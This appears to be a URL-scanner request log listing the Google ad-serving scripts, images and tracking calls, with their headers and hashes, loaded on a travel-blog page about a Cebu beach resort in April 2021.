https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/qs_click_protection_fy2019.js

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

c9581d69ef8a7435f061d76045cc929310f436366f9ced3b9b9811ca6ed26feb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:43:25 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 5261
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5599
x-xss-protection: 0
server: cafe
etag: 2241650964481140939
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:43:25 GMT

GET
H2 204 l
www.google.com/ads/measurement/ Frame AF47 0
0 14ms
13ms Image
text/html 2a00:1450:4001:808::2004
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.google.com/ads/measurement/l?ebcid=ALh7CaRP_B-pGG7JU-ODhoszziuLVnmh5zRN_9KhmCfSnaY_cWd9eoyaNg7TBgTeadd0dE8ovs0xYvNBoMK87uGzwW8tN3uYqA
Requested by: Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2a00:1450:4001:808::2004 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software: /
Resource Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

GET
H3-Q050 200 0d74ed574692e0488c8a49b73918ea59.js Show response
www.gstatic.com/mysidia/ Frame AF47 25 KB
10 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:810::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.gstatic.com/mysidia/0d74ed574692e0488c8a49b73918ea59.js?tag=mysidia_one_click_handler_one_afma_2019

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:810::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

11909c0ebcd1e1258ecf3c2ef83688b057b08e5d92a9c715f4fe44c13f20f7b4

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 07:08:00 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Thu, 25 Mar 2021 05:14:52 GMT
server: sffe
age: 72186
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7776000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 10398
x-xss-protection: 0
expires: Wed, 30 Jun 2021 07:08:00 GMT

GET
H3-Q050 200 downsize_200k_v1
tpc.googlesyndication.com/simgad/9264784204760531546/ Frame AF47 22 KB
22 KB 7ms
7ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/simgad/9264784204760531546/downsize_200k_v1?w=400&h=209

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

90772b8ff6f07d1e4374a1441aeedc07766a92a70f27bcbe3a27169af3c35ab0

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 02:22:15 GMT
x-content-type-options: nosniff
age: 2931
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 22713
x-xss-protection: 0
last-modified: Sun, 13 Dec 2020 10:58:21 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
expires: Sat, 02 Apr 2022 02:22:15 GMT

GET
DATA 200
OK truncated
/ Frame AF47 209 B
0 Image
image/svg+xml

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: d7779d95203bed5280ee3281f856607f95ac5df680547356656c7109d7d0a6a6

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/svg+xml

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame AF47 0
0 16ms
16ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=C5_owSotmYJvnAs2N7_UP7PiJqA2Iw-XtYd-F8pzfDOXY1NiVFBABIMXPnxNglYq4gsgHoAHawpmHA8gBCagDAcgDywSqBJcCT9A7ZPQwI3cHwt2ZCFg5s6AWd5st_TD_zeBa5V3OiKY9551SgX1WUAUuP4JAxv9-5Lf1pH4P1u_L1g-f7SshNxnnWWL3U-VKYmn4bXblzbMEaxxeqbRudYooqgINBwSo1QU9b01biRlHOke7ctuHETyTveO8p8gPQkB7xRsNZq2kJqf8zmc2IlK4WdT33q-xM2uZQu84EdkuZp82yBXP60WcDzssYwK8FoxGRRONRvSYoWXymMjjtLLExrlgQxT2OAgGjuhbhwZtg8Z5awySlkcsvziing2hJnGTMmjRuZyYshYD7Z2dksigurPyPy9MwZV_xEg9Yp2t_bUuGhBm4mh4mCgS3QHfNE8gCNzzgigaZj7bedHMwATv9d_UpwOSBQQIBBgBkgUECAUYBKAGLoAHjr3meKgH1ckbqAfw2RuoB_LZG6gHjs4bqAeT2BuoB7oGqAfulrECqAemvhuoB-zVG9gHAPIHBBCDmDXSCAkIgOGAEBABGB-ACgHICwHYEw2IFAOyFxoKGAgAEhRwdWItNjc2MTYxMTg4MDM1MTA1Mw&sigh=pJLbx4VhCP4&template_id=5000&tpd=AGWhJmuT8ZvBWSWx20SEOsNH1ZdQH2qUDH2ehV_7JtFqDv2-fw

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js Show response
pagead2.googlesyndication.com/bg/ Frame 276F 14 KB
6 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

ef586bf784948e62385ac9952a5ff1485f8b794c6b29328b71b67038ba26bc4f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 09:59:54 GMT
content-encoding: br
x-content-type-options: nosniff
last-modified: Wed, 24 Mar 2021 17:18:00 GMT
server: sffe
age: 61872
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5693
x-xss-protection: 0
expires: Fri, 01 Apr 2022 09:59:54 GMT

GET
H3-Q050 200 71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js Show response
pagead2.googlesyndication.com/bg/ Frame A701 14 KB
6 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

ef586bf784948e62385ac9952a5ff1485f8b794c6b29328b71b67038ba26bc4f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 09:59:54 GMT
content-encoding: br
x-content-type-options: nosniff
last-modified: Wed, 24 Mar 2021 17:18:00 GMT
server: sffe
age: 61872
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5693
x-xss-protection: 0
expires: Fri, 01 Apr 2022 09:59:54 GMT

GET
H3-Q050 200 8c77a2c821ca4e98b0049784c1486a62.js Show response
www.gstatic.com/mysidia/ Frame 3A61 6 KB
3 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:810::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.gstatic.com/mysidia/8c77a2c821ca4e98b0049784c1486a62.js?tag=client_fast_engine_2019

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:810::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

ec0c5f7a8de37a02414756f98e8e57a5b396961226b912f832c1c2b1590fb73b

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 23:03:20 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Thu, 25 Mar 2021 05:14:52 GMT
server: sffe
age: 14866
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7776000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 2797
x-xss-protection: 0
expires: Wed, 30 Jun 2021 23:03:20 GMT

GET
H3-Q050 200 cookie_push_onload.html Show response
pagead2.googlesyndication.com/pagead/s/ Frame 5297 1 KB
854 B 6ms
6ms Document
text/html 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/pagead/s/cookie_push_onload.html

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

9a9b7fb32e01fd70747f32efdbd0472fd681c85eebb0c42d10c7a514820a0062

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: pagead2.googlesyndication.com
:scheme: https
:path: /pagead/s/cookie_push_onload.html
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://googleads.g.doubleclick.net/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://googleads.g.doubleclick.net/

Response headers

p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
vary: Accept-Encoding
date: Thu, 01 Apr 2021 03:14:09 GMT
expires: Fri, 02 Apr 2021 03:14:09 GMT
content-type: text/html; charset=UTF-8
etag: 48472445140208031
x-content-type-options: nosniff
content-encoding: gzip
server: cafe
content-length: 724
x-xss-protection: 0
cache-control: public, max-age=86400
age: 86217
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"

GET
DATA 200
OK truncated
/ Frame AF47 210 B
0 Image
image/png

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: aa16d99242ca3a7ba444e859c0eddf3ba3a2d2268548ba94aa5ab1f17d8ddccf

Request headers

Referer
